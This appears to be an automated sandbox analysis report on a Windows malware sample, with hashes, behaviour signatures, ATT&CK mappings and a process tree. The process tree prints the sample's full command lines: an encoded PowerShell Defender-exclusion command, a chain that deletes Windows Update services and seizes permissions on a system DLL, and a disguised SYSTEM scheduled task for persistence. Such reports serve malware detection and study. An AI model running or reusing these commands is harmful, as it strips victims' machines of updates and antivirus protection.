Analysis

  • max time kernel
    43s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    10-05-2022 10:15

General

  • Target

    465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe

  • Size

    2.0MB

  • MD5

    79dbc1a54d33366681f1e926d565cad4

  • SHA1

    907cf0ec6784bf140f9759d6931d3697da0fc229

  • SHA256

    465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0

  • SHA512

    6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry key 1 TTPs 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
    "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:388
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:948
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1676
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          4⤵
            PID:1028
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            4⤵
              PID:1892
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              4⤵
                PID:532
              • C:\Windows\system32\sc.exe
                sc stop bits
                4⤵
                  PID:1200
                • C:\Windows\system32\sc.exe
                  sc stop dosvc
                  4⤵
                    PID:820
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    4⤵
                    • Modifies registry key
                    PID:600
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    4⤵
                    • Modifies registry key
                    PID:1688
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:684
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    4⤵
                    • Modifies registry key
                    PID:524
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    4⤵
                    • Modifies registry key
                    PID:1828
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1904
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:1812
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:1632
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:1516
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:564
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:908
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                    4⤵
                      PID:280
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      4⤵
                        PID:980
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                        4⤵
                          PID:1784
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                          4⤵
                            PID:1924
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                            4⤵
                              PID:388
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                              4⤵
                                PID:2004
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                4⤵
                                  PID:1964
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:436
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
                                  4⤵
                                  • Creates scheduled task(s)
                                  PID:872
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                3⤵
                                  PID:1084
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                    4⤵
                                      PID:948
                              • C:\Windows\system32\taskeng.exe
                                taskeng.exe {4358311D-E60E-4CB8-B000-D4368BA663D1} S-1-5-18:NT AUTHORITY\System:Service:
                                1⤵
                                  PID:1980

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Execution

                                Scheduled Task

                                1
                                T1053

                                Persistence

                                Modify Existing Service

                                2
                                T1031

                                Scheduled Task

                                1
                                T1053

                                Privilege Escalation

                                Scheduled Task

                                1
                                T1053

                                Defense Evasion

                                Modify Registry

                                2
                                T1112

                                Impair Defenses

                                1
                                T1562

                                File Permissions Modification

                                1
                                T1222

                                Impact

                                Service Stop

                                1
                                T1489

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • memory/280-83-0x0000000000000000-mapping.dmp
                                • memory/388-87-0x0000000000000000-mapping.dmp
                                • memory/436-77-0x0000000000000000-mapping.dmp
                                • memory/524-73-0x0000000000000000-mapping.dmp
                                • memory/532-67-0x0000000000000000-mapping.dmp
                                • memory/564-81-0x0000000000000000-mapping.dmp
                                • memory/600-70-0x0000000000000000-mapping.dmp
                                • memory/684-72-0x0000000000000000-mapping.dmp
                                • memory/820-69-0x0000000000000000-mapping.dmp
                                • memory/872-78-0x0000000000000000-mapping.dmp
                                • memory/908-82-0x0000000000000000-mapping.dmp
                                • memory/948-61-0x000007FEEE000000-0x000007FEEEB5D000-memory.dmp
                                  Filesize

                                  11.4MB

                                • memory/948-91-0x0000000000000000-mapping.dmp
                                • memory/948-57-0x0000000000000000-mapping.dmp
                                • memory/948-60-0x000007FEEEB60000-0x000007FEEF583000-memory.dmp
                                  Filesize

                                  10.1MB

                                • memory/948-63-0x00000000025CB000-0x00000000025EA000-memory.dmp
                                  Filesize

                                  124KB

                                • memory/948-62-0x00000000025C4000-0x00000000025C7000-memory.dmp
                                  Filesize

                                  12KB

                                • memory/980-84-0x0000000000000000-mapping.dmp
                                • memory/1028-65-0x0000000000000000-mapping.dmp
                                • memory/1084-90-0x0000000000000000-mapping.dmp
                                • memory/1200-68-0x0000000000000000-mapping.dmp
                                • memory/1516-80-0x0000000000000000-mapping.dmp
                                • memory/1632-79-0x0000000000000000-mapping.dmp
                                • memory/1676-64-0x0000000000000000-mapping.dmp
                                • memory/1688-71-0x0000000000000000-mapping.dmp
                                • memory/1784-85-0x0000000000000000-mapping.dmp
                                • memory/1812-76-0x0000000000000000-mapping.dmp
                                • memory/1828-74-0x0000000000000000-mapping.dmp
                                • memory/1892-66-0x0000000000000000-mapping.dmp
                                • memory/1904-75-0x0000000000000000-mapping.dmp
                                • memory/1924-86-0x0000000000000000-mapping.dmp
                                • memory/1964-89-0x0000000000000000-mapping.dmp
                                • memory/1996-56-0x0000000000000000-mapping.dmp
                                • memory/2004-88-0x0000000000000000-mapping.dmp
                                • memory/2028-59-0x0000000000110000-0x00000000002ED000-memory.dmp
                                  Filesize

                                  1.9MB

                                • memory/2028-55-0x000007FEFC451000-0x000007FEFC453000-memory.dmp
                                  Filesize

                                  8KB

                                • memory/2028-54-0x000000001B230000-0x000000001B40C000-memory.dmp
                                  Filesize

                                  1.9MB